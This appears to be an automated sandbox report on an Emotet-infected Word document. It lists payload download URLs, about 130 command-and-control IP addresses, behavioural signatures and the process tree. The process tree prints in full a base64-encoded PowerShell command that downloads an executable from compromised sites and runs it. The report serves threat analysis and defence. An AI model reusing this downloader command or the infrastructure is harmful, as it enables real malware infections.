Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
29-01-2020 14:47
General
Malware Config
Extracted
http://bestcondodeals.net/wp-content/mYdUiWX/
http://bpbd.tabalongkab.go.id/cgi-bin/IBEHVS/
http://cajasparabotella.com/onptlekdj24sf/YtgArZrn/
http://boardgamesofold.com/wp-admin/a9illa9n-xzmtn3d4q5-1767396/
http://ashishswarup.in/wp-includes/xovzx5w-4avccc6-572705647/
Extracted
emotet
186.10.98.177:80
154.70.158.97:80
95.66.182.136:80
68.183.18.169:8080
178.62.75.204:8080
178.33.167.120:8080
144.76.56.36:8080
61.204.119.188:443
163.172.107.70:8080
156.155.163.232:80
91.117.31.181:80
153.183.25.24:80
110.2.118.164:80
195.250.143.182:80
162.154.175.215:80
50.116.78.109:8080
72.176.87.136:80
184.162.115.11:443
37.70.131.107:80
181.39.96.86:443
41.185.29.128:8080
122.176.116.57:443
177.144.130.105:443
88.248.140.80:80
187.72.47.161:443
192.241.220.183:8080
182.176.116.139:995
192.241.241.221:443
109.236.109.159:8080
85.100.122.211:80
98.192.74.164:80
61.221.152.140:80
175.181.7.188:80
175.127.140.68:80
88.247.26.78:80
216.75.37.196:8080
179.5.118.12:8080
220.247.70.174:80
105.209.235.113:8080
211.20.154.102:80
182.74.249.74:80
37.46.129.215:8080
186.147.245.204:80
78.210.132.35:80
81.82.247.216:80
95.130.37.244:443
160.119.153.20:80
180.33.71.88:80
58.92.179.55:443
185.192.75.240:443
46.17.6.116:8080
78.46.87.133:8080
183.87.40.21:8080
183.82.123.60:443
190.171.153.139:80
181.196.27.123:80
185.244.167.25:443
200.82.88.254:80
82.145.43.153:8080
42.51.192.231:8080
154.73.137.131:80
112.186.195.176:80
41.77.74.214:443
78.189.165.52:8080
187.177.155.123:990
80.211.32.88:8080
1.217.126.11:443
162.144.46.90:8080
210.213.85.43:8080
75.86.6.174:80
190.93.210.113:80
23.253.207.142:8080
149.202.153.251:8080
72.27.212.209:8080
158.69.167.246:8080
188.251.213.180:443
212.112.113.235:80
182.187.137.199:8080
125.209.114.180:443
150.246.246.238:80
217.12.70.226:80
190.17.94.108:443
160.226.171.255:443
139.59.12.63:8080
196.6.119.137:80
51.77.113.97:8080
37.211.67.229:80
24.141.12.228:80
60.152.212.149:80
186.84.173.136:8080
5.196.200.208:8080
203.124.57.50:80
91.117.131.122:80
78.186.102.195:80
78.188.170.128:80
60.151.66.216:443
58.185.224.18:80
70.60.238.62:80
192.210.217.94:8080
85.96.49.152:80
85.109.190.235:443
89.215.225.15:80
203.153.216.178:7080
58.93.151.148:80
51.38.134.203:8080
88.225.230.33:80
81.214.142.115:80
157.7.164.178:8081
98.178.241.106:80
95.216.207.86:7080
59.135.126.129:443
1.221.254.82:80
172.104.70.207:8080
190.5.162.204:80
75.127.14.170:8080
91.83.93.103:443
82.146.55.23:7080
78.189.60.109:443
153.137.36.142:80
176.58.93.123:80
195.201.56.70:8080
186.10.92.114:80
144.139.91.187:80
201.183.251.100:80
77.74.78.80:443
69.30.205.162:7080
82.79.244.92:80
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4964 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE796.exe796.exebasicwce.exebasicwce.exepid process 4964 WINWORD.EXE 4384 796.exe 4032 796.exe 4200 basicwce.exe 4024 basicwce.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
PoWERsheLL.exedescription pid process Token: SeDebugPrivilege 4620 PoWERsheLL.exe -
Drops file in System32 directory 1 IoCs
Processes:
796.exedescription ioc process File renamed C:\Users\Admin\796.exe => C:\Windows\SysWOW64\basicwce.exe 796.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
PoWERsheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4620 996 PoWERsheLL.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
PoWERsheLL.exepid process 4620 PoWERsheLL.exe -
Executes dropped EXE 4 IoCs
Processes:
796.exe796.exebasicwce.exebasicwce.exepid process 4384 796.exe 4032 796.exe 4200 basicwce.exe 4024 basicwce.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
796.exebasicwce.exedescription pid process target process PID 4384 wrote to memory of 4032 4384 796.exe 796.exe PID 4200 wrote to memory of 4024 4200 basicwce.exe basicwce.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
796.exebasicwce.exepid process 4032 796.exe 4024 basicwce.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9ab92e41150dd1c132be3b79097a4b4fff2a151a9a5d77bd3e0aaeb41a5b862b.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exePoWERsheLL -e JABJAG8AcAB1AG4AbwB4AGUAZAA9ACcAVABuAGkAawBjAHkAbwBkAGUAbAAnADsAJABKAGEAYwB0AG8AYgB0AGYAYQBjACAAPQAgACcANwA5ADYAJwA7ACQATQBiAGoAZQBnAGoAagBrAGsAPQAnAE0AbgBvAGsAbgBhAHQAaAAnADsAJABKAG4AdgB4AG0AYQBkAGkAeQBiAHkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEoAYQBjAHQAbwBiAHQAZgBhAGMAKwAnAC4AZQB4AGUAJwA7ACQASQBmAGcAcQBxAGgAbQB6AGcAdABvAD0AJwBIAGwAZgB0AHgAdQBjAGEAaQB2ACcAOwAkAE4AaABvAG8AcAB4AHYAagBqAG4APQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQBUAC4AVwBFAEIAYwBMAEkARQBOAFQAOwAkAFMAdgB5AHAAawB2AGwAZwA9ACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AGMAbwBuAGQAbwBkAGUAYQBsAHMALgBuAGUAdAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBtAFkAZABVAGkAVwBYAC8AKgBoAHQAdABwADoALwAvAGIAcABiAGQALgB0AGEAYgBhAGwAbwBuAGcAawBhAGIALgBnAG8ALgBpAGQALwBjAGcAaQAtAGIAaQBuAC8ASQBCAEUASABWAFMALwAqAGgAdAB0AHAAOgAvAC8AYwBhAGoAYQBzAHAAYQByAGEAYgBvAHQAZQBsAGwAYQAuAGMAbwBtAC8AbwBuAHAAdABsAGUAawBkAGoAMgA0AHMAZgAvAFkAdABnAEEAcgBaAHIAbgAvACoAaAB0AHQAcAA6AC8ALwBiAG8AYQByAGQAZwBhAG0AZQBzAG8AZgBvAGwAZAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYQA5AGkAbABsAGEAOQBuAC0AeAB6AG0AdABuADMAZAA0AHEANQAtADEANwA2ADcAMwA5ADYALwAqAGgAdAB0AHAAOgAvAC8AYQBzAGgAaQBzAGgAcwB3AGEAcgB1AHAALgBpAG4ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB4AG8AdgB6AHgANQB3AC0ANABhAHYAYwBjAGMANgAtADUANwAyADcAMAA1ADYANAA3AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABQAGoAZABwAGQAcwBtAGMAcABlAHYAZABuAD0AJwBXAGsAZAB6AHAAeABjAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAZABqAGcAaQBmAHAAdgB5AGYAIABpAG4AIAAkAFMAdgB5AHAAawB2AGwAZwApAHsAdAByAHkAewAkAE4AaABvAG8AcAB4AHYAagBqAG4ALgAiAGQAYABvAHcATgBMAGAATwBBAEQAZgBpAGwAZQAiACgAJABGAGQAagBnAGkAZgBwAHYAeQBmACwAIAAkAEoAbgB2AHgAbQBhAGQAaQB5AGIAeQApADsAJABIAHYAbgB1AG8AegBrAGIAcwA9ACcASQBqAGQAYgBiAG0AdQBkAHAAYgBnAGkAcwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEoAbgB2AHgAbQBhAGQAaQB5AGIAeQApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAAzADEAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwByAGUAYABBAFQARQAiACgAJABKAG4AdgB4AG0AYQBkAGkAeQBiAHkAKQA7ACQAVwBvAGEAbQBkAGYAaAB3AHcAPQAnAEEAZgBsAGIAdgBvAGUAbwBhACcAOwBiAHIAZQBhAGsAOwAkAE8AbABpAGQAaQBnAGEAbgB1AHAAegB1AG4APQAnAE8AdQBkAGMAZwBlAGIAZgB0AHgAZQBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AcQBwAGUAeQBhAHAAZQBhAHcAYgB2AD0AJwBSAGIAawB4AG8AZAB6AGsAbAAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\796.exeC:\Users\Admin\796.exe1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\796.exe--52ac7a522⤵
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
-
C:\Windows\SysWOW64\basicwce.exe"C:\Windows\SysWOW64\basicwce.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\basicwce.exe--8726bf5d2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\796.exe
-
C:\Users\Admin\796.exe
-
C:\Users\Admin\796.exe
-
C:\Windows\SysWOW64\basicwce.exe
-
C:\Windows\SysWOW64\basicwce.exe
-
memory/4024-16-0x0000000000C80000-0x0000000000C97000-memory.dmpFilesize
92KB
-
memory/4024-17-0x0000000000400000-0x0000000000489000-memory.dmpFilesize
548KB
-
memory/4032-11-0x0000000000530000-0x0000000000547000-memory.dmpFilesize
92KB
-
memory/4032-12-0x0000000000400000-0x0000000000489000-memory.dmpFilesize
548KB
-
memory/4200-14-0x00000000005F0000-0x0000000000607000-memory.dmpFilesize
92KB
-
memory/4384-9-0x0000000000560000-0x0000000000577000-memory.dmpFilesize
92KB